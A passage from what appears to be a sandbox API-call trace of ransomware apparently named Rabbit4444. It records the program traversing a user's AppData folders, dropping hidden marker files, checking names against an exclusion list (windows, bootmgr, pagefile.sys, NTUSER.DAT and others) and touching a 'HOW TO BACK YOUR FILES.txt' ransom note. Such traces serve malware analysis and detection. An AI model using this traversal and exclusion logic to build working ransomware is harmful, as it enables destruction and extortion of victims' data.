(lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.HolographicFirstRun_cw5n1h2txyewy\\AppData\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.holographicfirstrun_cw5n1h2txyewy\\appdata\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x228 [0066.920] WriteFile (in: hFile=0x228, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0066.922] FlushFileBuffers (hFile=0x228) returned 1 [0066.923] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.HolographicFirstRun_cw5n1h2txyewy\\AppData\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0066.923] CloseHandle (hObject=0x228) returned 1 [0066.925] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.HolographicFirstRun_cw5n1h2txyewy\\AppData") returned 98 [0066.925] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0066.925] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.HolographicFirstRun_cw5n1h2txyewy\\AppData\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x75e25670, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0x75e25670, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0xf136833c, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1027d0 [0066.925] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0066.925] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0066.925] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0066.925] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0066.925] FindNextFileW (in: hFindFile=0x1027d0, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x75e25670, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0x75e25670, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0xf136833c, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0066.926] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0066.926] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0066.926] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0066.926] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0066.926] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0066.926] FindNextFileW (in: hFindFile=0x1027d0, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xf136833c, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xf136833c, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xf136833c, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0066.926] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0066.926] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0066.926] FindNextFileW (in: hFindFile=0x1027d0, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xf136833c, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xf136833c, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xf136833c, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 0 [0066.926] FindClose (in: hFindFile=0x1027d0 | out: hFindFile=0x1027d0) returned 1 [0066.926] lstrcpyW (in: lpString1=0x130ebfe, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0066.926] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.HolographicFirstRun_cw5n1h2txyewy\\AppData\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.holographicfirstrun_cw5n1h2txyewy\\appdata\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x228 [0066.926] CreateFileMappingW (hFile=0x228, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x27c [0066.927] MapViewOfFile (hFileMappingObject=0x27c, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0066.927] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0066.927] CloseHandle (hObject=0x27c) returned 1 [0066.927] CloseHandle (hObject=0x228) returned 1 [0066.927] GetCurrentThreadId () returned 0xd98 [0066.927] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0x1222a8 [0066.927] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.HolographicFirstRun_cw5n1h2txyewy\\AC", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.HolographicFirstRun_cw5n1h2txyewy\\AC") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.HolographicFirstRun_cw5n1h2txyewy\\AC" [0066.927] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xefb28 | out: hHeap=0xe0000) returned 1 [0066.927] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1222a0 | out: hHeap=0xe0000) returned 1 [0066.927] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.HolographicFirstRun_cw5n1h2txyewy\\AC" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.HolographicFirstRun_cw5n1h2txyewy\\AC") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.HolographicFirstRun_cw5n1h2txyewy\\AC" [0066.927] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.HolographicFirstRun_cw5n1h2txyewy\\AC", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.HolographicFirstRun_cw5n1h2txyewy\\AC\\") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.HolographicFirstRun_cw5n1h2txyewy\\AC\\" [0066.927] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.HolographicFirstRun_cw5n1h2txyewy\\AC\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.HolographicFirstRun_cw5n1h2txyewy\\AC\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.HolographicFirstRun_cw5n1h2txyewy\\AC\\.BFC0E91B00AE8A0620D3" [0066.927] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.HolographicFirstRun_cw5n1h2txyewy\\AC\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.holographicfirstrun_cw5n1h2txyewy\\ac\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x228 [0066.930] WriteFile (in: hFile=0x228, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0066.933] FlushFileBuffers (hFile=0x228) returned 1 [0066.933] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.HolographicFirstRun_cw5n1h2txyewy\\AC\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0066.934] CloseHandle (hObject=0x228) returned 1 [0066.935] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.HolographicFirstRun_cw5n1h2txyewy\\AC") returned 93 [0066.935] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0066.935] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.HolographicFirstRun_cw5n1h2txyewy\\AC\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x75e71ae4, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0x75e71ae4, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0xf136833c, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102a50 [0066.935] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0066.935] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0066.935] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0066.935] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0066.935] FindNextFileW (in: hFindFile=0x102a50, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x75e71ae4, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0x75e71ae4, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0xf136833c, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0066.935] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0066.935] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0066.935] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0066.935] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0066.935] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0066.935] FindNextFileW (in: hFindFile=0x102a50, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xf136833c, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xf136833c, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xf138e61d, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0066.935] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0066.935] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0066.935] FindNextFileW (in: hFindFile=0x102a50, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x75e71ae4, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0x75e71ae4, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x75e71ae4, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="INetCache", cAlternateFileName="INETCA~1")) returned 1 [0066.935] lstrcmpiW (lpString1="INetCache", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0066.936] lstrcmpiW (lpString1="INetCache", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0066.936] lstrcmpiW (lpString1="INetCache", lpString2="Rabbit4444.exe") returned -1 [0066.936] lstrcmpiW (lpString1="INetCache", lpString2=".") returned 1 [0066.936] lstrcmpiW (lpString1="INetCache", lpString2="..") returned 1 [0066.936] lstrcmpiW (lpString1="INetCache", lpString2="windows") returned -1 [0066.936] lstrcmpiW (lpString1="INetCache", lpString2="bootmgr") returned 1 [0066.936] lstrcmpiW (lpString1="INetCache", lpString2="pagefile.sys") returned -1 [0066.936] lstrcmpiW (lpString1="INetCache", lpString2="boot") returned 1 [0066.936] lstrcmpiW (lpString1="INetCache", lpString2="ids.txt") returned 1 [0066.936] lstrcmpiW (lpString1="INetCache", lpString2="NTUSER.DAT") returned -1 [0066.936] lstrcpyW (in: lpString1=0x130ebf4, lpString2="INetCache" | out: lpString1="INetCache") returned="INetCache" [0066.936] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.HolographicFirstRun_cw5n1h2txyewy\\AC\\INetCache", dwFileAttributes=0x2012) returned 1 [0066.936] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0x122080 [0066.936] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0xd0) returned 0x108760 [0066.936] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0x122088 | out: ListHead=0xf68b0, ListEntry=0x122088) returned 0x11cde8 [0066.936] FindNextFileW (in: hFindFile=0x102a50, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x75e71ae4, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0x75e71ae4, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x75e71ae4, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="INetCookies", cAlternateFileName="INETCO~1")) returned 1 [0066.936] lstrcmpiW (lpString1="INetCookies", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0066.936] lstrcmpiW (lpString1="INetCookies", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0066.936] lstrcmpiW (lpString1="INetCookies", lpString2="Rabbit4444.exe") returned -1 [0066.936] lstrcmpiW (lpString1="INetCookies", lpString2=".") returned 1 [0066.936] lstrcmpiW (lpString1="INetCookies", lpString2="..") returned 1 [0066.936] lstrcmpiW (lpString1="INetCookies", lpString2="windows") returned -1 [0066.936] lstrcmpiW (lpString1="INetCookies", lpString2="bootmgr") returned 1 [0066.936] lstrcmpiW (lpString1="INetCookies", lpString2="pagefile.sys") returned -1 [0066.936] lstrcmpiW (lpString1="INetCookies", lpString2="boot") returned 1 [0066.937] lstrcmpiW (lpString1="INetCookies", lpString2="ids.txt") returned 1 [0066.937] lstrcmpiW (lpString1="INetCookies", lpString2="NTUSER.DAT") returned -1 [0066.937] lstrcpyW (in: lpString1=0x130ebf4, lpString2="INetCookies" | out: lpString1="INetCookies") returned="INetCookies" [0066.937] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.HolographicFirstRun_cw5n1h2txyewy\\AC\\INetCookies", dwFileAttributes=0x2012) returned 1 [0066.937] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0x121f80 [0066.937] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0xd4) returned 0x11b6c8 [0066.937] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0x121f88 | out: ListHead=0xf68b0, ListEntry=0x121f88) returned 0x122088 [0066.937] FindNextFileW (in: hFindFile=0x102a50, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x75e71ae4, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0x75e71ae4, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x75e71ae4, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="INetHistory", cAlternateFileName="INETHI~1")) returned 1 [0066.937] lstrcmpiW (lpString1="INetHistory", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0066.937] lstrcmpiW (lpString1="INetHistory", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0066.937] lstrcmpiW (lpString1="INetHistory", lpString2="Rabbit4444.exe") returned -1 [0066.938] lstrcmpiW (lpString1="INetHistory", lpString2=".") returned 1 [0066.938] lstrcmpiW (lpString1="INetHistory", lpString2="..") returned 1 [0066.938] lstrcmpiW (lpString1="INetHistory", lpString2="windows") returned -1 [0066.938] lstrcmpiW (lpString1="INetHistory", lpString2="bootmgr") returned 1 [0066.938] lstrcmpiW (lpString1="INetHistory", lpString2="pagefile.sys") returned -1 [0066.938] lstrcmpiW (lpString1="INetHistory", lpString2="boot") returned 1 [0066.938] lstrcmpiW (lpString1="INetHistory", lpString2="ids.txt") returned 1 [0066.938] lstrcmpiW (lpString1="INetHistory", lpString2="NTUSER.DAT") returned -1 [0066.938] lstrcpyW (in: lpString1=0x130ebf4, lpString2="INetHistory" | out: lpString1="INetHistory") returned="INetHistory" [0066.938] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.HolographicFirstRun_cw5n1h2txyewy\\AC\\INetHistory", dwFileAttributes=0x2012) returned 1 [0066.938] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0x121fc0 [0066.938] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0xd4) returned 0x11b508 [0066.938] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0x121fc8 | out: ListHead=0xf68b0, ListEntry=0x121fc8) returned 0x121f88 [0066.938] FindNextFileW (in: hFindFile=0x102a50, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x75e71ae4, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0x75e71ae4, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x75e71ae4, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Temp", cAlternateFileName="")) returned 1 [0066.938] lstrcmpiW (lpString1="Temp", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0066.938] lstrcmpiW (lpString1="Temp", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0066.938] lstrcmpiW (lpString1="Temp", lpString2="Rabbit4444.exe") returned 1 [0066.938] lstrcmpiW (lpString1="Temp", lpString2=".") returned 1 [0066.938] lstrcmpiW (lpString1="Temp", lpString2="..") returned 1 [0066.938] lstrcmpiW (lpString1="Temp", lpString2="windows") returned -1 [0066.938] lstrcmpiW (lpString1="Temp", lpString2="bootmgr") returned 1 [0066.938] lstrcmpiW (lpString1="Temp", lpString2="pagefile.sys") returned 1 [0066.938] lstrcmpiW (lpString1="Temp", lpString2="boot") returned 1 [0066.938] lstrcmpiW (lpString1="Temp", lpString2="ids.txt") returned 1 [0066.938] lstrcmpiW (lpString1="Temp", lpString2="NTUSER.DAT") returned 1 [0066.938] lstrcpyW (in: lpString1=0x130ebf4, lpString2="Temp" | out: lpString1="Temp") returned="Temp" [0066.938] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0x122100 [0066.938] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0xc6) returned 0x116040 [0066.939] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0x122108 | out: ListHead=0xf68b0, ListEntry=0x122108) returned 0x121fc8 [0066.939] FindNextFileW (in: hFindFile=0x102a50, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x75e71ae4, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0x75e71ae4, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x75e71ae4, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Temp", cAlternateFileName="")) returned 0 [0066.939] FindClose (in: hFindFile=0x102a50 | out: hFindFile=0x102a50) returned 1 [0066.939] lstrcpyW (in: lpString1=0x130ebf4, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0066.939] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.HolographicFirstRun_cw5n1h2txyewy\\AC\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.holographicfirstrun_cw5n1h2txyewy\\ac\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x228 [0066.939] CreateFileMappingW (hFile=0x228, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x27c [0066.939] MapViewOfFile (hFileMappingObject=0x27c, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0066.940] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0066.940] CloseHandle (hObject=0x27c) returned 1 [0066.940] CloseHandle (hObject=0x228) returned 1 [0066.940] GetCurrentThreadId () returned 0xd98 [0066.940] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0x122108 [0066.940] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.HolographicFirstRun_cw5n1h2txyewy\\AC\\Temp", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.HolographicFirstRun_cw5n1h2txyewy\\AC\\Temp") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.HolographicFirstRun_cw5n1h2txyewy\\AC\\Temp" [0066.940] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x116040 | out: hHeap=0xe0000) returned 1 [0066.940] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x122100 | out: hHeap=0xe0000) returned 1 [0066.940] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.HolographicFirstRun_cw5n1h2txyewy\\AC\\Temp" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.HolographicFirstRun_cw5n1h2txyewy\\AC\\Temp") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.HolographicFirstRun_cw5n1h2txyewy\\AC\\Temp" [0066.940] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.HolographicFirstRun_cw5n1h2txyewy\\AC\\Temp", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.HolographicFirstRun_cw5n1h2txyewy\\AC\\Temp\\") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.HolographicFirstRun_cw5n1h2txyewy\\AC\\Temp\\" [0066.940] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.HolographicFirstRun_cw5n1h2txyewy\\AC\\Temp\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.HolographicFirstRun_cw5n1h2txyewy\\AC\\Temp\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.HolographicFirstRun_cw5n1h2txyewy\\AC\\Temp\\.BFC0E91B00AE8A0620D3" [0066.940] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.HolographicFirstRun_cw5n1h2txyewy\\AC\\Temp\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.holographicfirstrun_cw5n1h2txyewy\\ac\\temp\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x228 [0066.942] WriteFile (in: hFile=0x228, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0066.944] FlushFileBuffers (hFile=0x228) returned 1 [0066.945] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.HolographicFirstRun_cw5n1h2txyewy\\AC\\Temp\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0066.945] CloseHandle (hObject=0x228) returned 1 [0066.946] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.HolographicFirstRun_cw5n1h2txyewy\\AC\\Temp") returned 98 [0066.946] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0066.946] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.HolographicFirstRun_cw5n1h2txyewy\\AC\\Temp\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x75e71ae4, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0x75e71ae4, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0xf138e61d, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1026d0 [0066.946] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0066.946] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0066.946] lstrcmpiW (lpString1=".", 